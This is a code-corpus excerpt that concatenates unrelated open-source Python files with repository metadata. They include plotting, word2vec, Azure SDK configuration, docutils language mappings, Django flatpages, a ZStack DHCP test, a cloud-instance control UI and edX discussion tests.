self.ax.zaxis.set_major_formatter(FormatStrFormatter('%.0f'))
self.ax.set_zlim(zmin, zmax)
self.ax.xaxis.set_ticks(numpy.arange(x1, x2, 10))
self.ax.xaxis.set_major_formatter(FormatStrFormatter('%.0f'))
self.ax.yaxis.set_ticks(numpy.arange(y1, y2, 10))
self.ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))
self.ax.view_init(elev=20.0, azim=30.0)
self.fig.colorbar(sfc, orientation='horizontal', shrink=0.9,
pad=0.01)
self.draw()
except Exception as e:
self.logger.error("Error making surface plot: %s" % (
str(e)))
#END
|
stscieisenhamer/ginga
|
ginga/util/plots.py
|
Python
|
bsd-3-clause
| 17,329 | 0.002193 |
#!/usr/bin/env python
#-*- coding: utf-8 -*
import argparse
from lib.Parser import Parser
from lib.Vectorizer import Vectorizer
# 引数設定
parser = argparse.ArgumentParser()
parser.add_argument('menu')
parser.add_argument('in_path')
parser.add_argument('out_path', nargs='?')
def get_input():
pos = []
neg = []
for l in raw_input('\nplease input formula(or "END"): ').split('+'):
words = l.split('-')
pos.append(words[0])
for i in range(1, len(words)):
neg.append(words[i])
return pos, neg
if __name__ == '__main__':
args = parser.parse_args()
menu = args.menu
in_path = args.in_path
out_path = args.out_path
if menu == 'parse':
p = Parser('-Owakati')
p.parse_file(in_path, out_path)
elif menu == 'vectorize':
v = Vectorizer(min_count=10)
v.build_from_file(in_path)
v.store(out_path)
elif menu == 'calc':
v = Vectorizer()
v.load(in_path)
while True:
pos, neg = get_input()
if pos[0] == 'END':
break;
else:
v.calc(pos, neg)
|
smrmkt/sample_mecab_word2vec
|
corpus.py
|
Python
|
bsd-3-clause
| 1,144 | 0.004401 |
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2018 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
from marshmallow import Schema, fields, missing
class PositionSchemaV1(Schema):
current = fields.Raw()
institution = fields.Raw()
rank = fields.Raw()
display_date = fields.Method('get_display_date', default=missing)
def get_display_date(self, data):
current = data.get('current')
start_date = data.get('start_date')
end_date = data.get('end_date')
suffixed_start_date = '{}-'.format(start_date) if start_date else ''
if current:
return '{}present'.format(suffixed_start_date)
if end_date:
return '{}{}'.format(suffixed_start_date, end_date)
if start_date:
return start_date
return missing
|
inspirehep/inspire-next
|
inspirehep/modules/records/serializers/schemas/json/authors/common/position.py
|
Python
|
gpl-3.0
| 1,690 | 0 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy, AsyncARMChallengeAuthenticationPolicy
from .._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class SubscriptionClientConfiguration(Configuration):
"""Configuration for SubscriptionClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
"""
def __init__(
self,
credential: "AsyncTokenCredential",
**kwargs: Any
) -> None:
super(SubscriptionClientConfiguration, self).__init__(**kwargs)
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
self.credential = credential
self.api_version = "2018-06-01"
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'mgmt-resource/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs: Any
) -> None:
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = AsyncARMChallengeAuthenticationPolicy(self.credential, *self.credential_scopes, **kwargs)
|
Azure/azure-sdk-for-python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/v2018_06_01/aio/_configuration.py
|
Python
|
mit
| 2,950 | 0.004407 |
# -*- coding: utf-8 -*-
# Author: David Goodger
# Contact: goodger@users.sourceforge.net
# Revision: $Revision: 4229 $
# Date: $Date: 2005-12-23 00:46:16 +0100 (Fri, 23 Dec 2005) $
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Galician-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
u'atenci\u00f3n': 'attention',
u'advertencia': 'caution',
u'code (translation required)': 'code',
u'perigo': 'danger',
u'erro': 'error',
u'pista': 'hint',
u'importante': 'important',
u'nota': 'note',
u'consello': 'tip',
u'aviso': 'warning',
u'admonici\u00f3n': 'admonition',
u'barra lateral': 'sidebar',
u't\u00f3pico': 'topic',
u'bloque-li\u00f1a': 'line-block',
u'literal-analizado': 'parsed-literal',
u'r\u00fabrica': 'rubric',
u'ep\u00edgrafe': 'epigraph',
u'realzados': 'highlights',
u'coller-citaci\u00f3n': 'pull-quote',
u'compor': 'compound',
u'recipiente': 'container',
#'questions': 'questions',
u't\u00e1boa': 'table',
u't\u00e1boa-csv': 'csv-table',
u't\u00e1boa-listaxe': 'list-table',
#'qa': 'questions',
#'faq': 'questions',
u'meta': 'meta',
'math (translation required)': 'math',
#'imagemap': 'imagemap',
u'imaxe': 'image',
u'figura': 'figure',
u'inclu\u00edr': 'include',
u'cru': 'raw',
u'substitu\u00edr': 'replace',
u'unicode': 'unicode',
u'data': 'date',
u'clase': 'class',
u'regra': 'role',
u'regra-predeterminada': 'default-role',
u't\u00edtulo': 'title',
u'contido': 'contents',
u'seccnum': 'sectnum',
u'secci\u00f3n-numerar': 'sectnum',
u'cabeceira': 'header',
u'p\u00e9 de p\u00e1xina': 'footer',
#'footnotes': 'footnotes',
#'citations': 'citations',
u'notas-destino': 'target-notes',
u'texto restruturado-proba-directiva': 'restructuredtext-test-directive'}
"""Galician name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
u'abreviatura': 'abbreviation',
u'ab': 'abbreviation',
u'acr\u00f3nimo': 'acronym',
u'ac': 'acronym',
u'code (translation required)': 'code',
u'\u00edndice': 'index',
u'i': 'index',
u'sub\u00edndice': 'subscript',
u'sub': 'subscript',
u'super\u00edndice': 'superscript',
u'sup': 'superscript',
u'referencia t\u00edtulo': 'title-reference',
u't\u00edtulo': 'title-reference',
u't': 'title-reference',
u'referencia-pep': 'pep-reference',
u'pep': 'pep-reference',
u'referencia-rfc': 'rfc-reference',
u'rfc': 'rfc-reference',
u'\u00e9nfase': 'emphasis',
u'forte': 'strong',
u'literal': 'literal',
'math (translation required)': 'math',
u'referencia-nome': 'named-reference',
u'referencia-an\u00f3nimo': 'anonymous-reference',
u'referencia-nota ao p\u00e9': 'footnote-reference',
u'referencia-citaci\u00f3n': 'citation-reference',
u'referencia-substituci\u00f3n': 'substitution-reference',
u'destino': 'target',
u'referencia-uri': 'uri-reference',
u'uri': 'uri-reference',
u'url': 'uri-reference',
u'cru': 'raw',}
"""Mapping of Galician role names to canonical role names for interpreted text.
"""
|
JulienMcJay/eclock
|
windows/Python27/Lib/site-packages/docutils/parsers/rst/languages/gl.py
|
Python
|
gpl-2.0
| 3,711 | 0.001886 |
from django.conf import settings
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.models import get_current_site
from django.http import Http404, HttpResponse, HttpResponsePermanentRedirect
from django.shortcuts import get_object_or_404
from django.template import loader, RequestContext
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
DEFAULT_TEMPLATE = 'flatpages/default.html'
# This view is called from FlatpageFallbackMiddleware.process_response
# when a 404 is raised, which often means CsrfViewMiddleware.process_view
# has not been called even if CsrfViewMiddleware is installed. So we need
# to use @csrf_protect, in case the template needs {% csrf_token %}.
# However, we can't just wrap this view; if no matching flatpage exists,
# or a redirect is required for authentication, the 404 needs to be returned
# without any CSRF checks. Therefore, we only
# CSRF protect the internal implementation.
def flatpage(request, url):
"""
Public interface to the flat page view.
Models: `flatpages.flatpages`
Templates: Uses the template defined by the ``template_name`` field,
or :template:`flatpages/default.html` if template_name is not defined.
Context:
flatpage
`flatpages.flatpages` object
"""
if not url.startswith('/'):
url = '/' + url
site_id = get_current_site(request).id
try:
f = get_object_or_404(FlatPage,
url__exact=url, sites__id__exact=site_id)
except Http404:
if not url.endswith('/') and settings.APPEND_SLASH:
url += '/'
f = get_object_or_404(FlatPage,
url__exact=url, sites__id__exact=site_id)
return HttpResponsePermanentRedirect('%s/' % request.path)
else:
raise
return render_flatpage(request, f)
@csrf_protect
def render_flatpage(request, f):
"""
Internal interface to the flat page view.
"""
# If registration is required for accessing this page, and the user isn't
# logged in, redirect to the login page.
if f.registration_required and not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.path)
if f.template_name:
t = loader.select_template((f.template_name, DEFAULT_TEMPLATE))
else:
t = loader.get_template(DEFAULT_TEMPLATE)
# To avoid having to always use the "|safe" filter in flatpage templates,
# mark the title and content as already safe (since they are raw HTML
# content in the first place).
f.title = mark_safe(f.title)
f.content = mark_safe(f.content)
c = RequestContext(request, {
'flatpage': f,
})
response = HttpResponse(t.render(c))
return response
|
Beeblio/django
|
django/contrib/flatpages/views.py
|
Python
|
bsd-3-clause
| 2,846 | 0.000703 |
'''
1.create private vpc router network with cidr
2.check dhcp ip address
@author Antony WeiJiang
'''
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.net_operations as net_ops
import test_stub_for_dhcp_ip as test_stub_dhcp
import random
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
l2_query_resource = res_ops.L2_NETWORK
type_l2 = ["L2NoVlanNetwork","L2VlanNetwork"]
l3_name = "test_dhcp_server"
ip_range_name = "dhcp_ip_range"
ip_Version = [4,6]
networkcidr = "192.168.1.0/24"
dhcp_ip_for_private_vpc = "192.168.1.3"
dhcp_system_tags = ["flatNetwork::DhcpServer::"+dhcp_ip_for_private_vpc+"::ipUuid::null"]
def test():
test_util.test_logger("start dhcp test for l3 public network")
test_util.test_dsc("get no vlan network uuid")
private_vpcnetwork = test_stub_dhcp.VpcNetwork_IP_For_Dhcp()
private_vpcnetwork.set_l2_query_resource(l2_query_resource)
private_vpcnetwork.set_l2_type(type_l2[1])
l2_no_vlan_uuid = private_vpcnetwork.get_l2uuid()
test_util.test_logger("antony @@@debug : %s" %(l2_no_vlan_uuid))
test_util.test_logger("create l3 network")
private_vpcnetwork.set_ipVersion(ip_Version[0])
private_vpcnetwork.create_l3uuid(l3_name)
test_util.test_logger("antony @@@debug : %s" %(private_vpcnetwork.get_l3uuid()))
private_vpcnetwork.add_service_to_l3_vpcnetwork()
test_util.test_logger("add ip v4 range to l3 network")
private_vpcnetwork.add_ip_by_networkcidr(ip_range_name, networkcidr, dhcp_system_tags)
if private_vpcnetwork.check_dhcp_ipaddress().find(dhcp_ip_for_private_vpc) == -1:
test_util.test_fail("dhcp server ip create fail")
test_util.test_logger("delete l3 network")
private_vpcnetwork.del_l3uuid()
test_util.test_pass("dhcp server ip create successfully")
'''
to be define
'''
def error_cleanup():
pass
'''
to be define
'''
def env_recover():
pass
|
zstackorg/zstack-woodpecker
|
integrationtest/vm/simulator/dhcp_server_ip/test_dhcp_for_vpcrouter_cidr.py
|
Python
|
apache-2.0
| 2,037 | 0.018164 |
"""Process User Interface and execute commands.
License:
MCC - Command-Line Instance Control for AWS, Azure, GCP and AliCloud.
Copyright (C) 2017-2018 Robert Peteuil
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
URL: https://github.com/robertpeteuil/multi-cloud-control
Author: Robert Peteuil
"""
from __future__ import absolute_import, print_function
from builtins import range
from blessed import Terminal
from mcc.confdir import CONFIG_DIR
import sys
from mcc.cldcnct import busy_disp_on, busy_disp_off
from time import sleep
from mcc.colors import C_NORM, C_TI, C_GOOD, C_ERR, C_WARN, C_STAT, C_HEAD2
from gevent import monkey
from gevent import subprocess
monkey.patch_all()
term = Terminal()
def ui_main(fmt_table, node_dict):
"""Create the base UI in command mode."""
cmd_funct = {"quit": False,
"run": node_cmd,
"stop": node_cmd,
"connect": node_cmd,
"details": node_cmd,
"update": True}
ui_print("\033[?25l") # cursor off
print("{}\n".format(fmt_table))
sys.stdout.flush()
# refresh_main values:
# None = loop main-cmd, True = refresh-list, False = exit-program
refresh_main = None
while refresh_main is None:
cmd_name = get_user_cmd(node_dict)
if callable(cmd_funct[cmd_name]):
refresh_main = cmd_funct[cmd_name](cmd_name, node_dict)
else:
refresh_main = cmd_funct[cmd_name]
if cmd_name != "connect" and refresh_main:
ui_clear(len(node_dict) + 2)
return refresh_main
def get_user_cmd(node_dict):
"""Get main command selection."""
key_lu = {"q": ["quit", True], "r": ["run", True],
"s": ["stop", True], "u": ["update", True],
"c": ["connect", True], "d": ["details", True]}
ui_cmd_bar()
cmd_valid = False
input_flush()
with term.cbreak():
while not cmd_valid:
val = input_by_key()
cmd_name, cmd_valid = key_lu.get(val.lower(), ["invalid", False])
if not cmd_valid:
ui_print(" - {0}Invalid Entry{1}".format(C_ERR, C_NORM))
sleep(0.5)
ui_cmd_bar()
return cmd_name
def node_cmd(cmd_name, node_dict):
"""Process commands that target specific nodes."""
sc = {"run": cmd_startstop, "stop": cmd_startstop,
"connect": cmd_connect, "details": cmd_details}
node_num = node_selection(cmd_name, len(node_dict))
refresh_main = None
if node_num != 0:
(node_valid, node_info) = node_validate(node_dict, node_num, cmd_name)
if node_valid:
sub_cmd = sc[cmd_name] # get sub-command
refresh_main = sub_cmd(node_dict[node_num], cmd_name, node_info)
else: # invalid target
ui_print_suffix(node_info, C_ERR)
sleep(1.5)
else: # '0' entered - exit command but not program
ui_print(" - Exit Command")
sleep(0.5)
return refresh_main
def node_selection(cmd_name, node_qty):
"""Determine Node via alternate input method."""
cmd_disp = cmd_name.upper()
cmd_title = ("\r{1}{0} NODE{2} - Enter {3}#{2}"
" ({4}0 = Exit Command{2}): ".
format(cmd_disp, C_TI, C_NORM, C_WARN, C_HEAD2))
ui_cmd_title(cmd_title)
selection_valid = False
input_flush()
with term.cbreak():
while not selection_valid:
node_num = input_by_key()
try:
node_num = int(node_num)
except ValueError:
node_num = 99999
if node_num <= node_qty:
selection_valid = True
else:
ui_print_suffix("Invalid Entry", C_ERR)
sleep(0.5)
ui_cmd_title(cmd_title)
return node_num
def node_validate(node_dict, node_num, cmd_name):
"""Validate that command can be performed on target node."""
# cmd: [required-state, action-to-displayed, error-statement]
req_lu = {"run": ["stopped", "Already Running"],
"stop": ["running", "Already Stopped"],
"connect": ["running", "Can't Connect, Node Not Running"],
"details": [node_dict[node_num].state, ""]}
tm = {True: ("Node {1}{2}{0} ({5}{3}{0} on {1}{4}{0})".
format(C_NORM, C_WARN, node_num,
node_dict[node_num].name,
node_dict[node_num].cloud_disp, C_TI)),
False: req_lu[cmd_name][1]}
node_valid = bool(req_lu[cmd_name][0] == node_dict[node_num].state)
node_info = tm[node_valid]
return node_valid, node_info
def cmd_startstop(node, cmd_name, node_info):
"""Confirm command and execute it."""
cmd_lu = {"run": ["ex_start_node", "wait_until_running", "RUNNING"],
"stop": ["ex_stop_node", "", "STOPPING"]}
# specific delay & message {provider: {command: [delay, message]}}
cld_lu = {"azure": {"stop": [6, "Initiated"]},
"aws": {"stop": [6, "Initiated"]}}
conf_mess = ("\r{0}{1}{2} {3} - Confirm [y/N]: ".
format(C_STAT[cmd_name.upper()], cmd_name.upper(), C_NORM,
node_info))
cmd_result = None
if input_yn(conf_mess):
exec_mess = ("\r{0}{1}{2} {3}: ".
format(C_STAT[cmd_name.upper()], cmd_lu[cmd_name][2],
C_NORM, node_info))
ui_erase_ln()
ui_print(exec_mess)
busy_obj = busy_disp_on() # busy indicator ON
node_drv = getattr(node, "driver")
main_cmd = getattr(node_drv, cmd_lu[cmd_name][0])
response = main_cmd(node) # noqa
cmd_wait = cmd_lu[cmd_name][1]
if cmd_wait:
seccmd = getattr(node_drv, cmd_wait)
response = seccmd([node]) # noqa
delay, cmd_end = cld_lu.get(node.cloud,
{}).get(cmd_name, [0, "Successful"])
sleep(delay)
busy_disp_off(busy_obj) # busy indicator OFF
ui_print("\033[D") # remove extra space
cmd_result = True
ui_print_suffix("{0} {1}".format(cmd_name.title(), cmd_end), C_GOOD)
sleep(1.5)
else:
ui_print_suffix("Command Aborted")
sleep(0.75)
return cmd_result
def cmd_connect(node, cmd_name, node_info):
"""Connect to node."""
# FUTURE: call function to check for custom connection-info
conn_info = "Defaults"
conf_mess = ("\r{0}{1} TO{2} {3} using {5}{4}{2} - Confirm [y/N]: ".
format(C_STAT[cmd_name.upper()], cmd_name.upper(), C_NORM,
node_info, conn_info, C_HEAD2))
cmd_result = None
if input_yn(conf_mess):
exec_mess = ("\r{0}CONNECTING TO{1} {2} using {4}{3}{1}: ".
format(C_STAT[cmd_name.upper()], C_NORM, node_info,
conn_info, C_HEAD2))
ui_erase_ln()
ui_print(exec_mess)
(ssh_user, ssh_key) = ssh_get_info(node)
if ssh_user:
ssh_cmd = "ssh {0}{1}@{2}".format(ssh_key, ssh_user,
node.public_ips)
else:
ssh_cmd = "ssh {0}{1}".format(ssh_key, node.public_ips)
print("\n")
ui_print("\033[?25h") # cursor on
subprocess.call(ssh_cmd, shell=True)
ui_print("\033[?25l") # cursor off
print()
cmd_result = True
else:
ui_print_suffix("Command Aborted")
sleep(0.75)
return cmd_result
def cmd_details(node, cmd_name, node_info):
"""Display Node details."""
ui_print_suffix("Command Aborted")
return None
def ssh_get_info(node):
"""Determine ssh-user and ssh-key for node."""
ssh_key = ""
if node.cloud == "aws":
raw_key = node.extra['key_name']
ssh_key = "-i {0}{1}.pem ".format(CONFIG_DIR, raw_key)
ssh_user = ssh_calc_aws(node)
elif node.cloud == "azure":
ssh_user = node.extra['properties']['osProfile']['adminUsername']
elif node.cloud == "gcp":
items = node.extra['metadata'].get('items', [{}])
keyname = items['key' == 'ssh-keys'].get('value', "")
pos = keyname.find(":")
ssh_user = keyname[0:pos]
elif node.cloud == "alicloud":
ssh_user = ""
return ssh_user, ssh_key
def ssh_calc_aws(node):
"""Calculate default ssh-user based on image-if of AWS instance."""
userlu = {"ubunt": "ubuntu", "debia": "admin", "fedor": "root",
"cento": "centos", "openb": "root"}
image_name = node.driver.get_image(node.extra['image_id']).name
if not image_name:
image_name = node.name
usertemp = ['name'] + [value for key, value in list(userlu.items())
if key in image_name.lower()]
usertemp = dict(zip(usertemp[::2], usertemp[1::2]))
username = usertemp.get('name', 'ec2-user')
return username
def ui_print(to_print):
"""Print text without carriage return."""
sys.stdout.write(to_print)
sys.stdout.flush()
def ui_print_suffix(to_print, clr=C_WARN):
"""Print Colored Suffix Message after command."""
ui_print(" - {1}{0}{2}".format(to_print, clr, C_NORM))
def ui_cmd_title(cmd_title):
"""Display Title and function statement for current command."""
ui_erase_ln()
ui_print(cmd_title)
def ui_cmd_bar():
"""Display Command Bar."""
cmd_bar = ("\rSELECT COMMAND - {2}(R){1}un {0}(C){1}onnect "
"{3}(S){1}top {0}(U){1}pdate"
" {0}(Q){1}uit: ".
format(C_TI, C_NORM, C_GOOD, C_ERR))
# FUTURE - TO BE USED WHEN DETAILS IMPLEMENTED
# cmd_bar = ("\rSELECT COMMAND - {2}(R){1}un {0}(C){1}onnect "
# "{3}(S){1}top {0}(D){1}etails {0}(U){1}pdate Info"
# " {4}(Q){1}uit: ".
# format(C_TI, C_NORM, C_GOOD, C_ERR, C_HEAD2))
ui_erase_ln()
ui_print(cmd_bar)
def ui_del_char(check_len):
"""Move Left and delete one character."""
if check_len:
ui_print("\033[D \033[D")
def ui_clear(num_lines):
"""Clear previous display info from screen in prep for new data."""
ui_erase_ln()
for i in range(num_lines, 0, -1):
ui_print("\033[A")
ui_erase_ln()
def ui_erase_ln():
"""Erase line above and position cursor on that line."""
blank_ln = " " * (term.width - 1)
ui_print("\r{0}".format(blank_ln))
def input_flush():
"""Flush the input buffer on posix and windows."""
try:
import sys, termios # noqa
termios.tcflush(sys.stdin, termios.TCIFLUSH)
except ImportError:
import msvcrt
while msvcrt.kbhit():
msvcrt.getch()
def input_by_key():
"""Get user input using term.inkey to prevent /n printing at end."""
usr_inp = ''
input_valid = True
input_flush()
with term.cbreak():
while input_valid:
ui_print("\033[?25h") # cursor on
key_raw = term.inkey()
if key_raw.name == "KEY_ENTER":
input_valid = False
ui_print("\033[?25l") # cursor off
break
if key_raw.name == 'KEY_DELETE':
ui_del_char(len(usr_inp))
usr_inp = usr_inp[:-1]
if not key_raw.is_sequence:
usr_inp += key_raw
ui_print(key_raw)
if not usr_inp:
ui_print("\033[D")
return usr_inp
def input_yn(conf_mess):
"""Print Confirmation Message and Get Y/N response from user."""
ui_erase_ln()
ui_print(conf_mess)
with term.cbreak():
input_flush()
val = input_by_key()
return bool(val.lower() == 'y')
|
robertpeteuil/multi-cloud-control
|
mcc/uimode.py
|
Python
|
gpl-3.0
| 12,295 | 0.000081 |
# -*- coding: utf-8 -*-
from datetime import datetime
import json
from pytz import UTC
from django.core.urlresolvers import reverse
from django.test import TestCase
from edxmako import add_lookup
import mock
from django_comment_client.tests.factories import RoleFactory
from django_comment_client.tests.unicode import UnicodeTestMixin
from django_comment_client.tests.utils import ContentGroupTestCase
import django_comment_client.utils as utils
from student.tests.factories import UserFactory, CourseEnrollmentFactory
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
class DictionaryTestCase(TestCase):
def test_extract(self):
d = {'cats': 'meow', 'dogs': 'woof'}
k = ['cats', 'dogs', 'hamsters']
expected = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
self.assertEqual(utils.extract(d, k), expected)
def test_strip_none(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
expected = {'cats': 'meow', 'dogs': 'woof'}
self.assertEqual(utils.strip_none(d), expected)
def test_strip_blank(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': ' ', 'yetis': ''}
expected = {'cats': 'meow', 'dogs': 'woof'}
self.assertEqual(utils.strip_blank(d), expected)
def test_merge_dict(self):
d1 = {'cats': 'meow', 'dogs': 'woof'}
d2 = {'lions': 'roar', 'ducks': 'quack'}
expected = {'cats': 'meow', 'dogs': 'woof', 'lions': 'roar', 'ducks': 'quack'}
self.assertEqual(utils.merge_dict(d1, d2), expected)
class AccessUtilsTestCase(ModuleStoreTestCase):
"""
Base testcase class for access and roles for the
comment client service integration
"""
def setUp(self):
super(AccessUtilsTestCase, self).setUp(create_user=False)
self.course = CourseFactory.create()
self.course_id = self.course.id
self.student_role = RoleFactory(name='Student', course_id=self.course_id)
self.moderator_role = RoleFactory(name='Moderator', course_id=self.course_id)
self.community_ta_role = RoleFactory(name='Community TA', course_id=self.course_id)
self.student1 = UserFactory(username='student', email='student@edx.org')
self.student1_enrollment = CourseEnrollmentFactory(user=self.student1)
self.student_role.users.add(self.student1)
self.student2 = UserFactory(username='student2', email='student2@edx.org')
self.student2_enrollment = CourseEnrollmentFactory(user=self.student2)
self.moderator = UserFactory(username='moderator', email='staff@edx.org', is_staff=True)
self.moderator_enrollment = CourseEnrollmentFactory(user=self.moderator)
self.moderator_role.users.add(self.moderator)
self.community_ta1 = UserFactory(username='community_ta1', email='community_ta1@edx.org')
self.community_ta_role.users.add(self.community_ta1)
self.community_ta2 = UserFactory(username='community_ta2', email='community_ta2@edx.org')
self.community_ta_role.users.add(self.community_ta2)
def test_get_role_ids(self):
ret = utils.get_role_ids(self.course_id)
expected = {u'Moderator': [3], u'Community TA': [4, 5]}
self.assertEqual(ret, expected)
def test_has_forum_access(self):
ret = utils.has_forum_access('student', self.course_id, 'Student')
self.assertTrue(ret)
ret = utils.has_forum_access('not_a_student', self.course_id, 'Student')
self.assertFalse(ret)
ret = utils.has_forum_access('student', self.course_id, 'NotARole')
self.assertFalse(ret)
class CoursewareContextTestCase(ModuleStoreTestCase):
"""
Base testcase class for courseware context for the
comment client service integration
"""
def setUp(self):
super(CoursewareContextTestCase, self).setUp(create_user=True)
self.course = CourseFactory.create(org="TestX", number="101", display_name="Test Course")
self.discussion1 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion1",
discussion_category="Chapter",
discussion_target="Discussion 1"
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion2",
discussion_category="Chapter / Section / Subsection",
discussion_target="Discussion 2"
)
def test_empty(self):
utils.add_courseware_context([], self.course, self.user)
def test_missing_commentable_id(self):
orig = {"commentable_id": "non-inline"}
modified = dict(orig)
utils.add_courseware_context([modified], self.course, self.user)
self.assertEqual(modified, orig)
def test_basic(self):
threads = [
{"commentable_id": self.discussion1.discussion_id},
{"commentable_id": self.discussion2.discussion_id}
]
utils.add_courseware_context(threads, self.course, self.user)
def assertThreadCorrect(thread, discussion, expected_title): # pylint: disable=invalid-name
"""Asserts that the given thread has the expected set of properties"""
self.assertEqual(
set(thread.keys()),
set(["commentable_id", "courseware_url", "courseware_title"])
)
self.assertEqual(
thread.get("courseware_url"),
reverse(
"jump_to",
kwargs={
"course_id": self.course.id.to_deprecated_string(),
"location": discussion.location.to_deprecated_string()
}
)
)
self.assertEqual(thread.get("courseware_title"), expected_title)
assertThreadCorrect(threads[0], self.discussion1, "Chapter / Discussion 1")
assertThreadCorrect(threads[1], self.discussion2, "Subsection / Discussion 2")
class CategoryMapTestMixin(object):
"""
Provides functionality for classes that test
`get_discussion_category_map`.
"""
def assert_category_map_equals(self, expected, requesting_user=None):
"""
Call `get_discussion_category_map`, and verify that it returns
what is expected.
"""
self.assertEqual(
utils.get_discussion_category_map(self.course, requesting_user or self.user),
expected
)
class CategoryMapTestCase(CategoryMapTestMixin, ModuleStoreTestCase):
"""
Base testcase class for discussion categories for the
comment client service integration
"""
def setUp(self):
super(CategoryMapTestCase, self).setUp(create_user=True)
self.course = CourseFactory.create(
org="TestX", number="101", display_name="Test Course",
# This test needs to use a course that has already started --
# discussion topics only show up if the course has already started,
# and the default start date for courses is Jan 1, 2030.
start=datetime(2012, 2, 3, tzinfo=UTC)
)
# Courses get a default discussion topic on creation, so remove it
self.course.discussion_topics = {}
self.course.save()
self.discussion_num = 0
self.maxDiff = None # pylint: disable=invalid-name
def create_discussion(self, discussion_category, discussion_target, **kwargs):
self.discussion_num += 1
return ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion{}".format(self.discussion_num),
discussion_category=discussion_category,
discussion_target=discussion_target,
**kwargs
)
def test_empty(self):
self.assert_category_map_equals({"entries": {}, "subcategories": {}, "children": []})
def test_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
def check_cohorted_topics(expected_ids):
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "Topic A", "is_cohorted": "Topic_A" in expected_ids},
"Topic B": {"id": "Topic_B", "sort_key": "Topic B", "is_cohorted": "Topic_B" in expected_ids},
"Topic C": {"id": "Topic_C", "sort_key": "Topic C", "is_cohorted": "Topic_C" in expected_ids},
},
"subcategories": {},
"children": ["Topic A", "Topic B", "Topic C"]
}
)
check_cohorted_topics([]) # default (empty) cohort config
self.course.cohort_config = {"cohorted": False, "cohorted_discussions": []}
check_cohorted_topics([])
self.course.cohort_config = {"cohorted": True, "cohorted_discussions": []}
check_cohorted_topics([])
self.course.cohort_config = {"cohorted": True, "cohorted_discussions": ["Topic_B", "Topic_C"]}
check_cohorted_topics(["Topic_B", "Topic_C"])
